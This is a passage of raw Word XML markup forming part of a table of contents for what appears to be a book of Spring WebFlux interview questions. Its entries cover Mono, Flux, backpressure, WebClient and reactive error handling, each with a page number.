        <w:p w14:paraId="0496501C" w14:textId="2FE4B70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6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type of data does Mono represent?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307969 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>626</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="158BF700" w14:textId="758EDF4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7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a Flux in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307970 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>626</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="358F70A6" w14:textId="09FCBA8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7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how Flux works?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307971 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>627</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5AE16C3E" w14:textId="7EBA7AC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7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does Flux differ from Mono?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307972 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>628</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="15025B7F" w14:textId="161FA37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7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does reactive programming differ from imperative programming?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307973 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>629</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="167CC9DE" w14:textId="7A0FC51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7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Can you explain the reactive stream specification (Reactive Streams API)?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307974 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>631</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C58FC00" w14:textId="0354365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7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are the core components of Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307975 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>634</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CC8683D" w14:textId="7DC3F88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7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escribe the roles of Router Functions and Handler Functions in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307976 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>635</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F53B6A3" w14:textId="7A36F52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7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WebFluxHandlerAdapter?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307977 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>637</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="49927A2F" w14:textId="2B9BC5D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7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blocking and non-blocking in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307978 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>638</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1366375E" w14:textId="61B5A80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7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does Spring WebFlux handle concurrency?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307979 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>640</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5366BFE7" w14:textId="2DA1440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8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Can you give an example of a blocking operation in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307980 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>642</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27DCE7F2" w14:textId="7B8621B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8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does Spring WebFlux handle backpressure?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307981 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>642</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60BAFF63" w14:textId="25C88EC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8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backpressure and why is it important?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307982 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>644</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00E455F4" w14:textId="104A9EF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8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EnableWebFlux annotation used for?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307983 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>645</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="52C23513" w14:textId="474FED5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8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is it different from @EnableWebMvc?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307984 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>646</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F7B0606" w14:textId="40C901C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8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In which scenarios would you use this annotation?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307985 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>647</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DA2FD9B" w14:textId="60F15F0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8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role of WebClient in Spring WebFlux?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307986 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>649</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="60E7ECA9" w14:textId="18BD3D1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8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WebClient and RestTemplate?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307987 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>650</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C6F08EE" w14:textId="0FC9655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8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would you use WebClient to perform a reactive HTTP request?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307988 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>652</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AB65DC4" w14:textId="498D027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8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use of block() and subscribe() in Spring reactive?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307989 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>654</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1137F0BD" w14:textId="3E1CBA3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9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en should you use each of these methods?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307990 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>654</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A1B2F8B" w14:textId="6F76E88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9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are some advantages of using reactive programming in web applications?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307991 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>657</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6FFBB9C4" w14:textId="5AFF1C4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9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does non-blocking I/O enhance application performance?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307992 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>658</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27127EFA" w14:textId="3F26169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9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does Spring WebFlux handle error handling in a reactive pipeline?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196307993 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>659</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0B9E1085" w14:textId="3D0030B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9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onErrorResume() and how does it work?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
